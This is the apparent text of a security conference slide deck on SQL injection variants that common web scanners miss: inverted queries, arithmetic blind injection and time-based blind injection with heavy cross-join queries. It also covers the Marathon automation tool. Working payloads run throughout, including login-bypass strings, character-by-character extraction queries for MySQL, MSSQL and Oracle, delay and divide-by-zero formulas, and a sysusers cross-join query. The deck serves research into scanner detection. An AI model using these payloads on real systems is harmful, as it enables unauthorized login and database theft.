How ?¿$·& developers defeat the most famous web
vulnerability scanners …or how to recognize old
friends
Chema AlonsoInformática64
José ParadaMicrosoft Ibérica
Agenda
1.- Introduction2.- Inverted Queries3.- Arithmetic Blind SQL Injection4.- Time-Based Blind SQL Injection using Heavey
Queries5.- Conclusions
1.-Introduction
SQL Injection is still here among us
Web Application Security Consortium: Comparision
http://projects.webappsec.org/Web-Application-Security-Statistics
12.186 sites97.554 bugs
Need to Improve Automatic Scanning
• Not always a manual scanning is possible– Time– Confidentiality– Money, money, money…
• Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools.
2.-Inverted Queries
Homers, how are they?
• Lazy• Bad trainined• Poor Experience in
security stuff• Don´t like working• Don´t like computing• Don´t like coding• Don´t like you!
Flanders are Left-handed
Right
SELECT UIDFROM USERSWHERE NAME=‘V_NAME’ ANDPASSWORD=‘V_PASSW’;
Wrong?
SELECT UIDFROM USERSWHERE ‘V_NAME’=NAME
AND‘V_PASSW’=PASSWORD
Login Inverted QuerySelect uidFrom users where ‘v_name’=name and
‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=Kubica’ or '1'='1
Select uidFrom users where ‘Robert’=name and ‘Kubica’ or
‘1’=‘1’=password FAIL
Login Inverted SQL Injectionan example
Select uidFrom users where ‘v_name’=name and
‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica
Select uidFrom users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or
‘Kubica’=password Success
Blind Attacks• Attacker injects code but can´t access directly to
the data.• However this injection changes the behavior of
the web application. • Then the attacker looks for differences between
true code injections (1=1) and false code injections (1=2) in the response pages to extract data.– Blind SQL Injection– Biind Xpath Injection– Blind LDAP Injection
Blind SQL Injection Attacks
• Attacker injects:– “True where clauses”– “False where clauses“– Ex:
• Program.php?id=1 and 1=1• Program.php?id=1 and 1=2
• Program doesn’t return any visible data from database or data in error messages.
• The attacker can´t see any data extracted from the database.
Blind SQL Injection Attacks
• Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”:– Different hashes– Different html structure– Different patterns (keywords)– Different linear ASCII sums– “Different behavior”• By example: Response Time
Blind SQL Injection Attacks
• If any difference exists, then:– Attacker can extract all information from database– How? Using “booleanization”
• MySQL:– Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
» “True-Answer Page” or “False-Answer Page”?• MSSQL:
– Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers)
• Oracle:– Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)))
from all_users where rownum<=1)
Blind Inverted QuerySelect productFrom productsWhere v_value=id;
http://www.web.com/products.php?v_value=2 and 1=1
Select productFrom productsWhere 2 and 1=1=id;-> FAIL
The MySQL Case1 is True1=1=1 ->True1=1=(1+1-1)=abs(1)=1 -> True2=2=2 ->False-> 2=2 becomes True -> True=2-> True is equals to 1 then 1=2 is False
Select productFrom productsWhere v_value=id;
http://www.web.com/products.php?v_value=1 and 1=1
Select productFrom productsWhere 1 and 1=1=id;-> SUCCES (if there is a Id=1)
Web Scanner behaviors
• Acunetix• Paros• AppScan• W3af• Wapiti• Proxy Strike
Acunetix & Homer
Acunetix & Flanders
AppScan & Homer
AppScan & Flanders
Paros & Homer
Paros & Flanders
W3af & Homer
W3af & Flanders
Wapiti & Homer
Wapiti & Flanders
Demo
• W3af• Wapiti• Proxy Strike
Results
Normal Inverted MySQL MS SQL Server MySQL MS SQL Server
Numeric String Numeric String Numeric String Numeric String
Paros
AppScan
Acunetix
w3af
wapiti
Proxy Strike
In the end…
OUCH!!! Thank God for keep me safe
Solutions?
• Concat string injection• Arithmetic Blind SQL Injection• Time-Based Blind SQL injection– Delay Functions– Heavy queries
3.- Arithmetic
What about this queries?• How to detect/exploit this Blind SQLinjection
vulnerability?– The query forces the parameter to be numeric – SELECT field FROM table WHERE id=abs(param)– Ex:
Get Param(ID)Select ….. Where att1=abs(ID)Select ….. Where att2=k1-IDPrint response
• Not AND or OR operators can be used.• Boolean logic needs to be created with math
operations
Arithmetic Blind SQL Injection
• Divide by zero (David Litchfield)– Id=A+(1/(ASCII(B)-C))•A-> Param value originally used in the query.•B -> Value we are searching for, e.g.: Substring(passwd,1,1)•C-> Counter [0..255]
– TRUE: When ASCII(B)=C, the DB will generate a divide by zero exception.
Arithmetic Blind SQL Injection• Sums and subtractions– Id=A+ASCII(B)-C•A-> Param value originally used in the query.•B -> Value we are searching for, e.g.: Substring(passwd,1,1)•C-> Counter [0..255]
– When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A
Arithmetic Blind SQL Injection
• Value type overflow– Id=A+((C/ASCII(B))*(K))•A-> Param value originally used in the query.•B -> Value we are searching for, e.g.: Substring(passwd,1,1)•C-> Counter [0..255]•K-> Value that overflows the type defined for A
–(e.g. if A is integer, then K=2^32)
– When C/ASCII(B)==1, K*1 overflows the data type
Demo:
• Divide by zero• Sums and subtractions• Integer overflow
Conclusions
• Arithmetic Blind SQL Injection allows to construct binary logic without “AND” and “OR”.– detects bugs in this kind of queries…– And also in Inverted queries in which a numeric
value is used
• Almost none of the vulnerability scanners are using this method
4.-Time-based Blind SQL Injection using heavy queries
Time-Based Blind SQL Injection• In scenarios with no differences between “True-
Answer Page” and “False-Answer Page”, time delays can be used.
• Injection forces a delay in the response page when the condition injected is True. - Delay functions:
• SQL Server: waitfor • Oracle: dbms_lock.sleep• MySQL: sleep or Benchmark Function• Postgres: pg_sleep
– Ex:• ; if (exists(select * from users)) waitfor delay '0:0:5’
Time-Based Blind SQL InjectionWhat about DBs without delay functions, i.e.:
Oracle connections MS Access DB2without PL/SQL injection
Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks?
“Where-Clause” execution order
Select “whatever “From whateverWhere condition1 and condition2
- Condition1 lasts 10 seconds- Condition2 lasts 100 seconds
Which condition should be executed first?
The heavy condition first
Condition2 (100 sec) Condition1 (10 sec) Condition2 & condition1 Response Time
TRUE FALSE FALSE 110 sec
TRUE TRUE TRUE 110 sec
FALSE Not evaluated FALSE 100 sec
The light condition first
Condition1 (10 sec) Condition2 (100 sec) Condition1 & condition2 Response Time
TRUE FALSE FALSE 110 sec
TRUE TRUE TRUE 110 sec
FALSE Not evaluated FALSE 10 sec
Time-Based Blind SQL Injectionusing Heavy Queries
• Attacker can perform an exploitation delaying the “True-answer page” using a heavy query.
• It depends on how the database engine evaluates the where clauses in the query.
• There are two types of database engines:– Databases without optimization process– Databases with optimization process
Time-Based Blind SQL Injectionusing Heavy Queries
• Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections.
• The Cross-join injection must be heavier than the other condition.
• Attacker only have to know or to guess the name of a table with select permission in the database.
• Example in MSSQL:– Program.php?id=1 and (SELECT count(*) FROM sysusers
AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
“Default” tables to construct a heavy query
– Microsoft SQL Server• sysusers
– Oracle• all_users
– MySQL (versión 5)• information_schema.columns
– Microsoft Access• MSysAccessObjects (97 & 2000 versions)• MSysAccessStorage (2003 & 2007)
52
“Default” tables to construct a heavy query
• …or whatever you can guess– Clients– Customers– News– Logins– Users– Providers– ….Use your imagination…
Ex 1: MS SQL Server
Query takes 14 seconds -> True-Answer
Ex 1: MS SQL Server
• Query takes 1 second -> False-Answer
Ex 2: Oracle
Query Takes 22 seconds –> True-Answer
Ex 2: Oracle
Query Takes 1 second –> False-Answer
Ex 3: Access 2007
Query Takes 39 seconds –> True-Answer
Ex 3: Access 2007
Query Takes 1 second –> False-Answer
Marathon Tool
• Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases.
• Schema Extraction from known databases• Extract data using heavy queries not matter in
which database engine (without schema)• Developed in .NET• Source code available• http://www.codeplex.com/marathontool
Demo: Marathon Tool
5.- Conclusions
The real world has plenty kinds of developers…
References• Inverted SQL queries (Spanish)http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-de-ii.html • Arithemtic Blind SQL Injection (spanish)http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sql-injection-i-
de-ii.html • Time-Based Blind SQL Injection Using heavy queries & Marathon Toolhttp://www.defcon.org/images/defcon-16/dc16-presentations/alonso-
parada/defcon-16-alonso-parada-wp.pdf • Marathon Toolhttp://www.codeplex.com/marathontool • Connection String Attacks (spanish)http://www.slideshare.net/chemai64/connection-string-parameter-pollution
Don´t complain about your job!!